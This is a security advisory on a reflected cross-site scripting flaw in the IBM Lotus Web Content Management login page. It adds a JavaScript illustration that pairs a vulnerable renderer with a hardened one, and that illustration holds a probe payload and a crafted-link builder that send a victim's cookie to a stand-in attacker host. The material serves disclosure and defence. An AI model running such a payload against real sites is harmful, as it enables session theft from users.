iPolicy Networks Security Advisory
 

IBM Lotus Web Content Management Login Page XSS Vulnerability

Date Discovered: 01/20/2009
Severity: High
Applications Affected: IBM Lotus WCM 6.0.1.4
IBM Lotus WCM 6.0.1.5
IBM Lotus WCM 6.0.1.6
IBM Lotus WCM 6.1.0.1
IBM Lotus WCM 6.1.0.2
Type: Remote
Identifiers: CVE-2010-0357
Synopsis
IBM Lotus Web Content Management is prone to a cross-site scripting vulnerability that could be exploited to execute arbitrary script code in the security context of a logged-in user.
Recommended Actions
Restrict access to the application to trusted users. Note that the vulnerable code is on the login page, so it is reachable by anyone who can request that page; limiting access to trusted users or networks reduces exposure but does not remove it.
Threat Analysis
IBM Lotus Web Content Management is a content management software product by IBM intended to help in website design and maintenance. The product is part of IBM's Lotus family of products. Clients can install the product as a separate product or as an integrated option with WebSphere Portal.

IBM Lotus Web Content Management is prone to a cross-site scripting vulnerability. The flaw is in the application's login page, which does not adequately sanitize certain (unspecified) request parameters before reflecting them into the page. An attacker who entices a user to follow a crafted link can execute arbitrary script code in the security context of that user, for example to capture session credentials or perform actions on the user's behalf.
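The following is an added illustration of the flaw class described above; it is not code from the advisory, from iPolicy Networks or from IBM. It models a login page that reflects a request parameter into a hidden form field, first as written vulnerably and then hardened with context-appropriate HTML entity encoding, and includes the checks used to tell the two apart. The parameter name redirectUrl, the /login path, the portal host and the probe string are all assumptions for illustration; the advisory does not name the affected parameters.

```javascript
// Added example (not from the advisory or IBM): a minimal login page handler
// that reflects a request parameter, shown vulnerable and then hardened.
// The parameter name "redirectUrl", the "/login" path, the host names and
// the probe string are assumptions; the advisory names no parameters.

// Entity-encode a value for HTML text and double-quoted attribute contexts.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Shared page markup; the caller decides whether redirectValue was encoded.
function loginForm(redirectValue) {
  return [
    '<form method="post" action="/login">',
    '  <input type="hidden" name="redirectUrl" value="' + redirectValue + '">',
    '  <input name="user"><input type="password" name="pass">',
    '  <button>Log in</button>',
    "</form>",
  ].join("\n");
}

// Vulnerable: the raw query parameter is concatenated into an attribute value.
function renderLoginVulnerable(params) {
  return loginForm(params.redirectUrl || "/");
}

// Hardened: the same value is entity-encoded for the attribute context first.
function renderLoginHardened(params) {
  return loginForm(escapeHtml(params.redirectUrl || "/"));
}

// Constructed probe: closes the value attribute and the <input> tag, then
// injects a script that ships the visitor's cookie to an attacker host.
const PROBE =
  '"><script>location="http://attacker.invalid/?c="+document.cookie</script>';

// The crafted link an attacker would send to a victim (path is assumed).
function craftedLink(base) {
  return base + "/login?redirectUrl=" + encodeURIComponent(PROBE);
}

// What the server sees after the browser sends the crafted link.
function paramsFromLink(link) {
  return Object.fromEntries(new URL(link).searchParams.entries());
}

// Check 1: does the rendered page contain a live <script> tag, i.e. did the
// reflected value escape its attribute context?
function containsLiveScript(html) {
  return /<script[\s>]/i.test(html);
}

// Check 2: the raw attribute value the browser would assign to the hidden
// field. An empty string here means the probe closed the attribute early.
function hiddenFieldValue(html) {
  const m = html.match(/name="redirectUrl" value="([^"]*)"/);
  return m ? m[1] : null;
}

// Stand-alone demonstration of both renderings against the same request.
const request = paramsFromLink(craftedLink("http://portal.example"));
console.log("vulnerable reflects script:", containsLiveScript(renderLoginVulnerable(request)));
console.log("hardened reflects script:  ", containsLiveScript(renderLoginHardened(request)));
```

The hardened variant changes nothing for benign values; only the encoding of `"`, `<`, `>`, `&` and `'` differs, which is exactly what keeps the reflected value inside the attribute the developer intended. Output encoding must match the context the value lands in (attribute, text node, URL, script), so a single generic "sanitize" pass on input is not a substitute for it.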
References

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0357
http://xforce.iss.net/xforce/xfdb/55663
http://www.securityfocus.com/bid/37825

Write-up by: Gaurav Bajpai